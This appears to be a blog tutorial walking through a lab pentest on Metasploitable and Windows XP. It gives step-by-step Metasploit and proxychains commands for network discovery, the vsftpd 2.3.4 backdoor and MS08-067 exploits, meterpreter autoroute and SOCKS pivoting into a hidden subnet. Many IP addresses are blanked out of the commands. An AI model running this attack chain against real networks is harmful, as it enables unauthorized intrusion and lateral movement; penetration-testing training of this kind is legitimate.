2 minute read

Hello, cybersecurity enthusiasts and white hackers!

pivoting 1

This article I will consider scenarios for attacking protected segments of the corporate network using pivoting techniques via metasploit framework and proxychains.


Let’s consider at this network topology:

pivoting 1

for simplicity, I chose Metasploitable as machine A and vulnerable windows xp sp3 as machine B

enum and compromise machine A

Often in a real pentest, you do not know the exact address of the vulnerable machines in network, so first I did hosts discovery:

nmap -sn -T4 -oG - | awk '/Up$/{print $2}'

pivoting 1

As you can see, our target is

Then scan:

nmap -Pn -sV

pivoting 1

We found a vulnerable 21 port. But in this case we will pwn machine A via Metasploit Framework. The Metasploit Framework from Rapid7 is one of the best-known frameworks in the area of vulnerability analysis, and is used by many Red Teams and penetration testers worldwide.

Firstly, run:


pivoting 1

In my case I am using metasploit v5.0.87-dev from my kali VM.


use exploit/unix/ftp/vsftpd_234_backdoor
set RPORT 21

pivoting 1

As you can see, we got a reverse shell session.

enum network intefaces:


pivoting 1

And we discovered another network

update our shell to meterpreter:

use post/multi/manage/shell_to_meterpreter
set LPORT 4441

pivoting 1

access hidden network via proxy

Further, according to the scenario, the attacker wants to gain access to the subnet behind the interface. To do this, he needs to use a compromised host as a pivot.

Check our meterpreter session:

sessions -l

pivoting 1

The following command can be used to create a tunnel through an existing meterpreter session:

sessions -i 2
run autoroute -s
run autoroute -p

pivoting 1

We have added our additional route and this route will work during the meterpreter session is not closed.

In order for our tools such as nmap to work on this network, we must configure a socks4a proxy:

use auxiliary/server/socks4a
set SRVPORT 8090

pivoting 1


netstat -antp

pivoting 1

As you can see the proxy has been created immediately and you can see our current meterpreter session

Now we configure proxychains. Using the proxychains utility, any TCP connection can be sent to the destination via TOR, SOCKS4, SOCKS5, HTTP/HTTPS proxy. Let’s make a small update in the settings file /etc/proxychains.conf:

nvim /etc/proxychains.conf

pivoting 1

Then, scan via proxychains and nmap:

proxychains4 nmap -sT -p21,22,135,139,445 2>&1 | grep 'OK'

pivoting 1

exploit and access machine B

scan machine B:

proxychains4 nmap -Pn -sT -sV

pivoting 1

so, machine OS is Microsoft Windows XP

check port 445 for vulnerability:

proxychains4 nmap -Pn -sT -sV --script=*smb-vuln*

pivoting 1

is vulnerable to ms08-067.

Run in metasploit again:

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/bind_tcp
set LPORT 4447

pivoting 1

Here we used the bind shell, so it’s not necessary to create the reverse route.

pivoting 1

So, the machine B has been pwned :)


the attacker discovered secret network by following the steps below.

  • attacker got an access to the machine A ( which was on same network with attacker via exploitation vsftpd 2.3.4 on port 21
  • then he realise that machine A has 2 network interfaces
  • access hidden network via autoroute in meterpreter session to machine A
  • create socks4a proxy
  • then attacker scan ports on new discovered network
  • scan ports on
  • machine B have vulnerable smb on port 445
  • successfully exploit ms08-067 on machine B
  • final

first part
pivoting via metasploit

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine